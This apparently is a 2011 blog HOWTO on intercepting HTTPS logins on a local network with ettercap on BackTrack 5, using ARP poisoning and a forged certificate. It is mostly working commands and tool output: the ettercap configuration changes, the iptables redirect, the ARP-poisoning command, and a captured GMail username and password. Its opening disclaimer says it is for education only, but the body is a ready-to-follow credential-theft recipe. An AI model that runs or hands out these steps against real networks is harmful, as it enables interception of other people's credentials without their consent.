Saturday, May 28, 2011

HOWTO : Sniffing SSL with ettercap on Back|Track 5

*** WARNING : This HOWTO is for educational only. Do NOT carry out the following steps on a LAN that without permission. Otherwise, you will be put into the jail. ***

Sniffing SSL (https) traffic on LAN with ettercap by mean of Man In The Middle (MITM) attack.

Step 1 :

nano /etc/etter.conf

Make the change as the following :

ec_uid = 0    # nobody is the default
ec_gid = 0    # nobody is the default

Uncomment the following :

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Step 2 :

Victim's machine is at while the router is at Attacker is at

ettercap -TqM arp:remote / /

The outcome of the display is as the following :

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Dissector "dns" not supported (etter.conf line 72)
Listening on eth0... (Ethernet)

eth0 ->    08:00:27:FF:95:DB

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |=================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 70:1A:04:FF:0A:9A

GROUP 2 : 00:1E:10:FF:A7:E2
Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

Step 3 :

At the victim's machine, open a browser, such as Firefox and go to GMail. You will be asked to accept an untrusted certification. Just accept the certificate and you will be directed to the login screen of GMail.

When the victim login to the GMail, his/her username and password will be logged on the Attacker's machine. The display will be similar to the following :

HTTP : -> USER: samiux PASS: password INFO:

You will find that USER: samiux and PASS: password.

Remarks :

To delete the untrusted certificate on Firefox at victim's machine : "Edit" -- "Perference" -- "View Certificate List" -- "Server". You will find something like the following. You just delete them all.

Thawte Consulting (Pty) Ltd. forever 2011-09-21 forever 2011-09-21

In general, GMail will not ask you to accept any certificate, especially untrusted one.

That's all! See you.